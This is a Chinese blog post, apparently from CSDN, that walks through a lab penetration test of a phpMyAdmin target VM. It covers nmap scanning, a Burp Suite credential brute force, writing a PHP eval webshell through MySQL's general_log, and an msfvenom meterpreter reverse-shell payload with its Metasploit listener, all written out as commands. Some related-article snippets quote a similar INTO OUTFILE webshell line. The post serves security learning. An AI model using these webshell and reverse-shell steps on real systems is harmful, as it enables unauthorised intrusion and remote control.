Web渗透测试对靶机注入shell(phpMyAdmin)

最新推荐文章于 2023-09-22 09:36:53 发布
最新推荐文章于 2023-09-22 09:36:53 发布
阅读量3.3k 收藏 11
点赞数 2
分类专栏: phpMyAdimin 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SYJ_361/article/details/121952135
版权

Web渗透测试对靶机注入shell

文章目录

1、寻找目标信息

netdiscover扫描

打开kali,使用root权限,输入命令

netdiscover

image-20211214185824204

目标主机为显示 VMare的IP地址得到目标主机IP地址为:192.168.0.4

nmap扫描

输入命令

nmap -sV -O -T4 192.168.0.4

发现目标主机有端口3306是打开的

image-20211214190022018

利用御剑后台进行扫描

输入域名(就是目标IP地址):192.168.0.4

得到网页地址:phpMyAdmin

image-20211214190130463

网页界面如下

image-20211214190146927

2、对登录页面进行暴力破解

启动burp suite对目标网页进行拦截

image-20211220090649561

对目标进行暴力破解

  • 首先,单击【鼠标右键】–【发送给测试器】–点击【Intruder】
  • 进入intruder界面后,点击【Positions】
  • 然后点击【清除】把变量都清楚了
  • 选中【admin】(username和password)后面的值,单击【添加】,把要进行暴力破解的变量进行添加
  • 下拉攻击类型选中【Clusterbomb】

image-20211220090904268
image-20211219223546375

  • 然后点击【Payload】
  • 有效负载集为1载入Username.txt文件中的数据
  • 有效负载集为2载入Password.txt文件中的数据
  • 然后点击【开始攻击】:程序自动进行暴力破解
  • 匹配用户名和密码
    • 破解得到用户名为:root
    • 密码为:root

image-20211219223904927

image-20211214191553909

image-20211214191602209

3、进入phpmyadmin界面

查看主页信息

image-20211220093336920

对目标信息进行渗透处理

查看日志是否打开
  • 点击【变量】
    • 查看是否开启日志和日志地址

image-20211220091655447

创建日志文件getshell
进入SQL界面
#set global general_log=on; #开启日志
set global general_log_file = 'C:/phpstudy/www/xxb.php'; #设置指定文件为网址日志存放文件
select '<?php @eval($_POST["xxb"]);?>';

下面图片是先前截的图

image-20211220092104020

image-20211214192205996

再次进入【变量】

把general log_file的路径中的文件名换成刚才新建的文件名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-elVsz80o-1639965105766)(C:/Users/18393/AppData/Roaming/Typora/typora-user-images/image-20211220092324395.png)]

4、用中国蚁剑进行连接

建立连接

注意后缀名和密码

点击测试连接–连接成功–保存这个状态

image-20211220092951504

用kali生成木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -f exe -o /home/kali/shell.exe
注意

LHOST的IP地址

和/home/kali/shell.exe的路径和文件名

建议把文件名改成自己想的名字

把生成的文件上传到服务器

image-20211214193013840

用kali进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.59.134
set lport 4444
run

image-20211214193543801

image-20211214193609301

用中国蚁剑运行程序

image-20211214193706012

去kali看看

入侵成功

image-20211214193754944

5、后渗透阶段

查看当前角色

getuid

最低0.47元/天 解锁文章
小小西贝
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
渗透测试靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2625
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
靶机练习 aliens phpmyadminshell date命令提权
hljzzj的博客
01-25 3606
靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-aliens,676/ 名称: hacksudo系列ALIENS 靶场: VulnHub.com 难度: 简单 发布时间: 2021年4月4日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -.
渗透测试学习之靶机Five86-1
情感博主V
03-21 546
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.147 2个http端口,80是Apache,10000那个查一下: web站点相关服务信息 80Apache下的站点: 10000端口下的集成环境: 服务信息看不出啥 ...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2099
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
WEB安全基础入门—操作系统命令注入shell 注入
Eason_LYC安全白帽子的成长博客
06-09 1935
WEB安全基础入门—操作系统命令注入shell注入) 欢迎关注订阅专栏! WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏!......
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
靶机练习-phpmyadmin-getshell
qq_52223347的博客
01-11 504
漏洞利用 找到php后台的管理页面和root密码 getshell 访问http://192.168.0.144/phpmyadmin 弱口令 root/root 登入 两种利用方式 sql查询 利用into outfile直接写入shell文件 很遗憾secure_file_priv的值是NULL,也就是不允许导入导出,如果尝试写入shell文件会失败: show variables like ‘%secure%’ secure_file_priv 是用来限制 load dumpfile、int
靶机渗透测试实战——DC-5
weixin_45116657的博客
10-30 6660
实验环境: 目标机DC-5的IP地址:未知(192.168.85.144) 攻击机kali的IP地址:192.168.85.139 实验步骤: 1、主机扫描,确定目标主机 命令:arp-scan -l 2、端口扫描,确定详细服务 命令1:nmap -sS -Pn -A -p- 192.168.85.144 命令2:nmap -sV -p- 192.168.85.144 #-sV —— 用来扫...
总结分析 | 基于phpmyadmin渗透测试
小司机的奥拓
09-22 2717
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
Phpmyadmin的一次渗透测试
weixin_30715523的博客
06-07 664
首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了 尝试使用Navicate进行数据库连接返回禁止远程连接数据库: 但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接: Navicat安装目录下上传ntunnel_mysql.php文件(数据库的代理脚本)到目标服务器任意web站点目录(后面getsh...
靶机渗透(三)——Lazysysadmin
qq_45751902的博客
04-21 3369
环境配置 都是在vmware中 靶机:未知,nat模式 kali:192.168.92.5 nat,模式 信息收集 arp-scan -l 扫描局域网内所有的ip 从上图可知,靶机的ip是192.168.92.6 端口扫描 nmap -sS -Pn -T4 -sV -O 192.168.92.6 或者 masscan 192.168.92.6 -p 0-65535 --rate=10000 masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫 namp:-T4(分为0-5等级;-s
2022年中职组网络安全国赛A模块题目解析
qq_57147160的博客
04-13 8868
2022年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (1) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名.
SQL注入WebShell方式小结
热门推荐
Mi1k7ea
12-09 2万+
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmap写shell 前提都是需要对目标目录具有写权限。 -...
[TOP10]十大渗透测试演练系统
ropin_os的专栏
09-18 4685
本文总结了目前网络上比较流行的渗透测试演练系统,这些系统里面都提供了一些实际的安全漏洞,排名不分先后,各位安全测试人员可以亲身实践如何利用这个漏洞,同时也可以学习到漏洞的相关知识。 DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的
kali linux渗透测试靶机
最新发布
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值